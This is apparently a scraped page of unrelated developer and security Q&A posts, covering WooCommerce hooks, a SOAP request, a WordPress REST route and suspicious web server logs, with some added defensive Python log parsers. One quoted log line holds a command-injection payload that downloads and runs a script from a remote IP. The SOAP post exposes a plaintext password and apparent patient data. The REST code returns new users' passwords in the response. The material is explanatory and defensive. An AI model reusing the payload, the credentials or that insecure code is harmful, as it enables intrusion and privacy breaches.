Trying to run an add_action within a function to run a WooCommerce function on an AJAX request

I am able to get an AJAX request to work properly on a WooCommerce checkout form page; now I want to update the price of the checkout in that AJAX request. My add_action is in the function that is fired by the AJAX request.

This is all done in a custom plugin as well

Here is my code thus far; it doesn’t seem like the function request_gift_card ever fires:

    function gift_card_redeem(){
        if(!empty($_SERVER['HTTP_X_REQUESTED_WITH']) && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) == 'xmlhttprequest') {
            error_log("test !empty");

            add_action( 'woocommerce_before_calculate_totals', 'request_gift_card', 99 );

            function request_gift_card($cart_object){
                if( !WC()->session->__isset( "reload_checkout" )) {
                    /* Gift wrap price */
                    $additionalPrice = 5;
                    error_log($cart_object);
                    foreach ( $cart_object->cart_contents as $key => $value ) {
                        if( isset( $value["embossing_fee"] ) ) {
                            // Turn $value['data']->price in to $value['data']->get_price()
                            $orgPrice = floatval( $value['data']->get_price() );
                            $discPrice = $orgPrice + $additionalPrice;
                            $value['data']->set_price($discPrice);
                        }
                    }
                }
            }

            $result['type'] = "success";
            $result = json_encode($result);
            echo $result;
        }
        else {
            error_log("test else");
            header("Location: ".$_SERVER["HTTP_REFERER"]);
        }

        die();
    }

What am I doing wrong with the SOAP request, getting error invalid timeout formats [closed]

    <?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
      <soap:Header>
        <SecurityHeader xmlns="http://services.medconnect.net/submissionportal">
          <UserName>2143883</UserName>
          <Password><![CDATA[I3zt!7&W]]></Password>
        </SecurityHeader>
      </soap:Header>
      <soap:Body>
        <SubmitSync xmlns="http://services.medconnect.net/submissionportal">
          <request><![CDATA[ISA*00*          *00*          *ZZ*EXPEDIUM       *30*204202692      *200904*0419*^*00501*007281118*0*P*:~GS*HS*EXPEDIUM*204202692*20200904*0419*7281119*X*005010X279A1~ST*270*007281120*005010X279A1~BHT*0022*13*7281120*20200904*0419~HL*1**20*1~NM1*PR*2*BCBS OF NORTH CAROLINA*****PI*10383~HL*2*1*21*1~NM1*1P*2*BEAUFORT COUNTY HEALTH DEPARTMENT*****XX*1679576763~REF*TJ*566001521~PRV*PE*PXC*261QP0905X~HL*3*2*22*0~TRN*1*1013076869*9919649646~NM1*IL*1*BROWN*JEAN*M***MI*KBOW1747326401~REF*SY*141117752~DMG*D8*19650504*F~DTP*291*D8*20200904~EQ*30~SE*16*007281120~GE*1*7281119~IEA*1*007281118]]></request>
          <requestFormat>EDI</requestFormat>
          <responseFormat>EDI</responseFormat>
          <synchronousTimeout>00:01:00</synchronousTimeout>
          <submissionTimeout>00:01:00</submissionTimeout>
        </SubmitSync>
      </soap:Body>
    </soap:Envelope>

Response
-----------

    <faultstring>Invalid Timeout Format: , Valid Format: d.hh:mm:ss, Note: Hours &lt;= 23, Minutes &lt;= 59, Seconds &lt;= 59</faultstring>

Please advise on this.

No route was found matching the URL and request method. I don’t understand where the problem is

When I send parameters, I get this: No route was found matching the URL and request method.

    /**
     * Add json data on plugin.
     *
     * */
    add_action('rest_api_init', 'register_api_hooks');
    function register_api_hooks() {
      register_rest_route(
        'passwordless_register/v0', '/register/(?P<name>[a-zA-Z0-9-]+)/(?P<email>[a-zA-Z0-9-]+)/?aam-jwt=(?P<token>[a-zA-Z0-9-]+)',
        array(
          'methods'  => 'POST',
          'callback' => 'wc_rest_user_endpoint_handler',
        )
      );
    }

    /**
     * Register a new user
     *
     * @param  WP_REST_Request $request Full details about the request.
     * @return array $args.
     **/
    function wc_rest_user_endpoint_handler($request) {
      $request = new WP_REST_Request( 'POST', 'passwordless_register/v0/register/(?P<name>[a-zA-Z0-9-]+)/(?P<email>[a-zA-Z0-9-]+)/?aam-jwt=(?P<token>[a-zA-Z0-9-]+)' );
      $username = $request['name'];
      $email = $request['email'];
      $response = array();
      $error = new WP_Error();
      if (empty($username)) {
        $error->add(400, __("name field 'username' is required.", 'wp-rest-user'), array('status' => 400));
        return $error;
      }
      if (empty($email)) {
        $error->add(401, __("Email field 'email' is required.", 'wp-rest-user'), array('status' => 400));
        return $error;
      }
      $user_id = username_exists($username);
      if (!$user_id && email_exists($email) == false) {
        $password = wp_generate_password( 20, false );
        $user_id = wp_create_user($username, $password, $email);
        if (!is_wp_error($user_id)) {
          // Get User Meta Data (Sensitive, Password included. DO NOT pass to front end.)
          $user = get_user_by('id', $user_id);
          // $user->set_role($role);
          $user->set_role('subscriber');
          // WooCommerce specific code
          if (class_exists('WooCommerce')) {
            $user->set_role('customer');
          }
          // Get User Data (Non-Sensitive, Pass to front end.)
          wp_nonce_field( 'wpa_passwordless_login_request', 'nonce', false );
          $unique_url = wpa_generate_url( $email , $nonce );
          $response['code'] = 200;
          $response['message'] = __("User '" . $username . "' Registration was Successful", "wp-rest-user");
          $response['mail'] = __("Mail '" . $email . "' Registration was Successful", "wp-rest-email");
          $response['password'] =  __("Pass '" . $password . "' Registration was Successful", "wp-rest-pass");
          $response['url'] =  __("Link '" . $unique_url . "' Registration was Successful", "wp-rest-url");
        } else {
          return $user_id;
        }
      } else {
        $error->add(406, __("Email already exists, please try 'Reset Password'", 'wp-rest-user'), array('status' => 400));
        return $error;
      }
      return new WP_REST_Response($response, 123);
    }
    add_action( 'after_setup_theme', 'passwordless_register/v0' );

HTTP Request Smuggling Basics

I am currently trying to learn about the HTTP Request Smuggling vulnerability to further enhance my pen testing skills. I have watched a couple of videos on YouTube and read articles online regarding it but still have a couple of questions in mind. Questions:

  • What are the attack vectors of HTTP Request Smuggling (where should I look)?
  • What is the main way to provide a PoC to companies with high traffic? I know that HTTP Smuggling could possibly steal people’s cookies; can this be used for the PoC or is this illegal?
  • Can this or other vulnerabilities be chained together? (e.g. self-XSS & CSRF)

Thank you everyone!

Information exposure through query strings in url of a POST request [duplicate]

I can’t seem to find any information online for when there is information exposure through query strings in URL of a POST request.

I understand it is an issue for when it’s sent in HTTP GET. Wondering if it would still be an issue for when it’s sent in POST?

e.g.

POST /api/view?username=USER 

Weird GET request on internet facing Nginx

I spun up an internet facing nginx server in AWS and the logs started showing weird GET requests with a search engine’s spider as user agent.

    172.31.43.193 - - [19/Aug/2020:20:09:19 +0000] "GET /rexcategory?categoryCodes=SHPCAT33&t=1360657001168 HTTP/1.1" 404 153 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "49.7.20.159"

    2020/08/19 20:08:39 [error] 29#29: *14 open() "/usr/share/nginx/html/eyloyrewards/category" failed (2: No such file or directory), client: 172.31.43.193, server: localhost, request: "GET /eyloyrewards/category?categoryCode=SHPCAT118&t=1314948609334 HTTP/1.1", host: "www.rewards.etihadguest.com"

    172.31.43.193 - - [19/Aug/2020:20:08:39 +0000] "GET /eyloyrewards/category?categoryCode=SHPCAT118&t=1314948609334 HTTP/1.1" 404 153 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "49.7.20.159"

The domain mentioned in the second line does not belong to me. What is the meaning of these logs? Is my server being used to attack the mentioned domain, "www.rewards.etihadguest.com" ?
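The nginx error log records the Host header each client sent, so requests addressed to names you do not serve can be counted directly. The following is an added example, not part of the original post; the log lines are constructed and `OWNED_HOSTS` is a hypothetical list of your own server names.

```python
import re

# Fields nginx appends to an error-log entry about a request.
ERROR_RE = re.compile(
    r'client: (?P<client>[^,]+), server: (?P<server>[^,]+), '
    r'request: "(?P<request>[^"]*)", host: "(?P<host>[^"]+)"'
)

OWNED_HOSTS = {"my-site.example"}  # hypothetical: names this server really serves

# Constructed sample entries in the shape of the error-log line in the post.
SAMPLE_ERROR_LOG = [
    '2020/08/19 20:08:39 [error] 29#29: *14 open() "/usr/share/nginx/html/shop/category" '
    'failed (2: No such file or directory), client: 10.0.0.5, server: localhost, '
    'request: "GET /shop/category?code=1 HTTP/1.1", host: "www.not-mine.example"',
    '2020/08/19 20:08:41 [error] 29#29: *15 open() "/usr/share/nginx/html/missing.png" '
    'failed (2: No such file or directory), client: 10.0.0.5, server: localhost, '
    'request: "GET /missing.png HTTP/1.1", host: "my-site.example:8080"',
    '2020/08/19 20:09:02 [error] 29#29: *16 open() "/usr/share/nginx/html/shop/item" '
    'failed (2: No such file or directory), client: 10.0.0.5, server: localhost, '
    'request: "GET /shop/item?id=7 HTTP/1.1", host: "WWW.NOT-MINE.example"',
    '2020/08/19 20:09:10 [notice] 1#1: signal process started',
]

def foreign_host_requests(error_log_lines, owned_hosts):
    """Count logged requests per Host header that is not one of our own names."""
    owned = {h.lower() for h in owned_hosts}
    counts = {}
    for line in error_log_lines:
        m = ERROR_RE.search(line)
        if not m:
            continue  # entry is not tied to a request (startup notices etc.)
        # Host headers are case-insensitive and may carry a :port suffix.
        host = re.sub(r":\d+$", "", m.group("host").lower())
        if host not in owned:
            counts[host] = counts.get(host, 0) + 1
    return counts

if __name__ == "__main__":
    for host, n in foreign_host_requests(SAMPLE_ERROR_LOG, OWNED_HOSTS).items():
        print(f"{n} request(s) sent with foreign Host header {host!r}")
```
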

I am seeing an ICMP type 3 error message in my firewall logs. However, I am unable to find the original request sent to that external IP [closed]

No matching connection for ICMP error message: icmp src inside: X.X.X.98 dst outside: X.X.X.11 (type 3, code 2) on inside interface. Original IP payload: udp src X.X.X.11/53 dst X.X.X.98/52906.

Can somebody please help me understand the cause.

Transformation of an object into parameter value on submission of request

Today I saw a rather weird phenomenon when submitting a request spontaneously.

The URL I typed looked something like below:

https://example.com/en/trade/pro?layout= and when submitted it transformed into https://example.com/en/trade?layout=pro

If I perceived correctly, the pro object moved to the value of layout (if not just visually).

It didn’t work for https://example.com/en/trade/test?layout= and when submitted should transform into https://example.com/en/trade?layout=test, that didn’t work.

It did only work for the pro object.

Is this a behavior made by developers of the site or could this eventually lead to something interesting?

Very Strange Access Request to my website

Recently I got a very odd request to my website. This is from the log file:

    20.42.89.182 - - [12/Aug/2020:18:48:13 -0400] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 302 195 "-" "-"
    20.42.89.182 - - [12/Aug/2020:18:48:13 -0400] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 302 195 "-" "-"

It appears to be trying to run some shell commands, including what I believe to be downloading the source of a site with cURL. I tried to visit this URL but it was blocked by my security filter. What is kerbynet? Is this part of Cloudflare and can it be used to run shell commands on my website?

It should be noted that I use Cloudflare.
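Requests like the one in the post can be found in an access log by URL-decoding each query parameter and checking it for shell syntax. The following is an added example, not part of the original post; the sample lines are constructed in the same shape with documentation-range addresses, and the two patterns are illustrative rather than exhaustive.

```python
import re
from urllib.parse import unquote_plus

# Request field of a combined-format access log entry: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Command separators/substitution, and commands typical of "download then run".
SHELL_META = re.compile(r'[;|`]|\$\(|&&')
FETCH_AND_RUN = re.compile(r'\b(curl|wget|sh|bash|chmod)\b')

# Constructed samples (addresses are from the documentation ranges).
SAMPLE_LINE = (
    '203.0.113.9 - - [12/Aug/2020:18:48:13 -0400] "GET /cgi-bin/kerbynet?'
    'Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20'
    'http%3A%2F%2F198.51.100.7%2Fzero;sh%20zero;%22 HTTP/1.0" 302 195 "-" "-"'
)
BENIGN_LINE = (
    '203.0.113.9 - - [12/Aug/2020:18:49:02 -0400] '
    '"GET /shop?item=fish+and+chips&page=2 HTTP/1.1" 200 512 "-" "-"'
)

def suspicious_params(log_line):
    """Return [(param, decoded_value, reasons)] for query values that look like shell injection."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    query = m.group("target").partition("?")[2]
    findings = []
    # Split on '&' only: the payload itself contains literal ';' characters.
    for pair in filter(None, query.split("&")):
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)
        reasons = []
        if SHELL_META.search(value):
            reasons.append("shell-metacharacter")
        if FETCH_AND_RUN.search(value):
            reasons.append("download-or-exec-command")
        if reasons:
            findings.append((unquote_plus(name), value, reasons))
    return findings

if __name__ == "__main__":
    for name, value, reasons in suspicious_params(SAMPLE_LINE):
        print(f"param {name!r} decodes to {value!r}: {', '.join(reasons)}")
```
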

What is the term for data leaking from one HTTP request to another and how to prevent it?


Context

We recently added a feature that used a library whose API we misunderstood. Long story short, if user A sends a request to our web application, the library caches some result, and that result may show in a response to user B’s request. Needless to say, this is a security bug, specifically, data from user A leaks to user B.

Although it is well-known that web applications should be stateless, the long dependency graph of such applications makes the likelihood of some downstream library (or its bad usage) accidentally leaking data between requests non-zero. I can imagine this bug is possible with a wide range of web frameworks and environments (e.g., Django, .NET, NodeJS, AWS Lambda), since they all reuse the application between requests to avoid cold starts.

Questions

  1. What is the proper term for data leaking server-side between HTTP requests, due to an honest developer mistake? Terms such as session hijacking and session fixation seem to refer exclusively to malicious attacks.

  2. Are there tools and methods to test for such mistakes or detect them in production?
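One way to test for the bug described above is to replay requests from several users through a single long-lived application instance, give each user a unique canary value, and fail if any response contains another user's canary. The following is an added example, not part of the original post; both service classes and all names are hypothetical stand-ins for the misused library.

```python
import uuid

class LeakyProfileService:
    """Hypothetical handler with a process-wide cache that is not keyed on the user."""
    def __init__(self):
        self._cache = {}

    def render(self, user, secret):
        # BUG: the key ignores `user`, so the first caller's result is served to everyone.
        if "profile" not in self._cache:
            self._cache["profile"] = f"hello {user}, token={secret}"
        return self._cache["profile"]

class ScopedProfileService:
    """Same handler with the cache key scoped to the requesting user."""
    def __init__(self):
        self._cache = {}

    def render(self, user, secret):
        key = ("profile", user)
        if key not in self._cache:
            self._cache[key] = f"hello {user}, token={secret}"
        return self._cache[key]

def find_cross_request_leaks(handler, users=("alice", "bob"), rounds=3):
    """Interleave requests from `users` through one handler instance.

    Each user's request carries a unique canary. Returns a sorted list of
    (data_owner, recipient) pairs where the owner's canary appeared in a
    response delivered to the recipient.
    """
    canaries = {u: f"canary-{uuid.uuid4().hex}" for u in users}
    leaks = set()
    for _ in range(rounds):
        for user in users:
            body = handler(user, canaries[user])
            for other, canary in canaries.items():
                if other != user and canary in body:
                    leaks.add((other, user))
    return sorted(leaks)

if __name__ == "__main__":
    print("leaky :", find_cross_request_leaks(LeakyProfileService().render))
    print("scoped:", find_cross_request_leaks(ScopedProfileService().render))
```

The same canary check can run against a staging deployment by sending the interleaved requests over HTTP to one warm instance instead of calling the handler in-process.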